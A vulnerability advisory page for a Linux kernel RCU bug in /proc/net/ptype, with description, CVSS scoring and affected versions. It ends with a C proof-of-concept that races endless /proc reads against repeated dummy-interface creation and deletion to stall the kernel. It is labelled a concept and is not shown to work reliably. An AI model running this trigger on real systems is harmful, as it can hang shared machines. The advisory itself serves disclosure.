Security Vulnerability Report
CVE-2026-23255 CVSS 5.5 MEDIUM

Published: 2026-03-18 18:16:24
Last Modified: 2026-05-21 00:15:07
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

net: add proper RCU protection to /proc/net/ptype

Yin Fengwei reported an RCU stall in ptype_seq_show() and provided a patch.

Real issue is that ptype_seq_next() and ptype_seq_show() violate RCU rules.

ptype_seq_show() runs under rcu_read_lock(), and reads pt->dev to get device name without any barrier.

At the same time, concurrent writers can remove a packet_type structure (which is correctly freed after an RCU grace period) and clear pt->dev without an RCU grace period.

Define ptype_iter_state to carry a dev pointer along seq_net_private:

struct ptype_iter_state {
	struct seq_net_private	p;
	struct net_device	*dev; // added in this patch
};

We need to record the device pointer in ptype_get_idx() and ptype_seq_next() so that ptype_seq_show() is safe against concurrent pt->dev changes.

We also need to add full RCU protection in ptype_seq_next(). (Missing READ_ONCE() when reading list.next values)

Many thanks to Dong Chenchen for providing a repro.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

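cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 2.6.12.1 up to, but not including, 6.6.136) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.7 up to, but not including, 6.12.80) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.13 up to, but not including, 6.18.10) - VULNERABLE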
cpe:2.3:o:linux:linux_kernel:2.6.12:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:2.6.12:rc2:*:*:*:*:*:* - VULNERABLE
Linux Kernel (net subsystem) - for specific versions, see the relevant commits on git.kernel.org
Linux Kernel 2.6.x ~ 6.x series affected

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>

// PoC concept for CVE-2026-23255 - RCU stall in /proc/net/ptype
// This demonstrates the race condition between reading ptype and concurrent modifications

void *reader_thread(void *arg)
{
    // Repeatedly read /proc/net/ptype to trigger seq_show
    while (1) {
        FILE *fp = fopen("/proc/net/ptype", "r");
        if (fp) {
            char buffer[1024];
            while (fgets(buffer, sizeof(buffer), fp)) {
                // Reading device names triggers ptype_seq_show()
            }
            fclose(fp);
        }
        usleep(100); // Small delay to increase race window
    }
    return NULL;
}

void *writer_thread(void *arg)
{
    // Concurrent network device operations that modify ptype list
    // This triggers packet_type removal without proper RCU grace period
    while (1) {
        system("ip link del dummy0 2>/dev/null");
        system("ip link add dummy0 type dummy");
        system("ip link del dummy0");
        usleep(50);
    }
    return NULL;
}

int main(void)
{
    pthread_t r1, r2, w1, w2;

    // Create reader threads - simulate ptype_seq_show() access
    pthread_create(&r1, NULL, reader_thread, NULL);
    pthread_create(&r2, NULL, reader_thread, NULL);

    // Create writer threads - simulate concurrent packet_type modifications
    pthread_create(&w1, NULL, writer_thread, NULL);
    pthread_create(&w2, NULL, writer_thread, NULL);

    pthread_join(r1, NULL);
    pthread_join(r2, NULL);
    pthread_join(w1, NULL);
    pthread_join(w2, NULL);
    return 0;
}
